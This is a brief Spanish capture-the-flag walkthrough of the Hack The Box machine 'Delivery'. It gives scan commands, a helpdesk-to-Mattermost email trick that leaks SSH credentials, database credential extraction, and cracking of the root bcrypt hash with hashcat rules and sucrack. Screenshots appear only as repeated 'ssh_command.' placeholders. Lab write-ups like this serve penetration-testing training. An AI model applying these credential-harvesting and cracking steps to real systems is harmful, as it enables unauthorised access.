Delivery

Delivery


HTB Linux

nmap -A -p- -oA sink 10.129.151.232 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA sink 10.129.151.232

nmap -sU -O -p- -oA sink-udp 10.129.151.232

nikto -h 10.129.151.232:80

ssh_command.

ssh_command.

whatweb http://10.129.151.232

ssh_command.

http://10.129.151.232/:8065/login

ssh_command.

http://helpdesk.delivery.htb

ssh_command.

Creamos un tiquete

ssh_command.

Adquirimos un tiquete 2494997 y tratamos de ver el estatus de nuestro tiquete.

ssh_command.

Ahora nos vamos a mattermost Y metemos la siguiente informacion.

ssh_command.

Ahora vemos la siguiente informacion. copiamos el url. Por ejemplo el que empieza asi: http://delivery.htb:8065/do_verify_email?token=

ssh_command.

http://delivery.htb:8065/select_team

ssh_command.

Ahora podemos ver las credenciales:

Credenciales-> maildeliverer:Youve_G0t_Mail!

ssh_command.

sh maildeliver@delivery.htb

ssh_command.

id

sudo -l

cd /

find -perm -4000 2>/dev/null

ssh_command.

getcap -r 2>/dev/null

uname -a

lsb_release -a

ssh_command.

Creamos un archivo pwd con el siguiente texto PleaseSubscribe!

hashcat —stdout pwd -r /usr/share/hashcat/rules/best64.rule

ssh_command.

hashcat —stdout pwd -r /usr/share/hashcat/rules/best64.rule > passwords

cat /etc/sshd_config | grep -i permit_root_login

cat /etc/sshd_config | grep -i root

git clone https://github.com/hemp3l/sucrack

cd sucrack

./configure

make

ssh_command.

cat /opt/mattermost/config/config.json | grep DataSource

ssh_command.

mysql -umuser -pCrack_The_MM_Admin_PW

use mattermost

select Username,Password,Email from Users where Username=“root”

ssh_command.

hashcat -a 0 -m 3200 hash dict -r /usr/share/hashcat/rules/best64.rule

ssh_command.

root:PleaseSubscribe!21

ssh_command.

© 2025 Cu3rv0x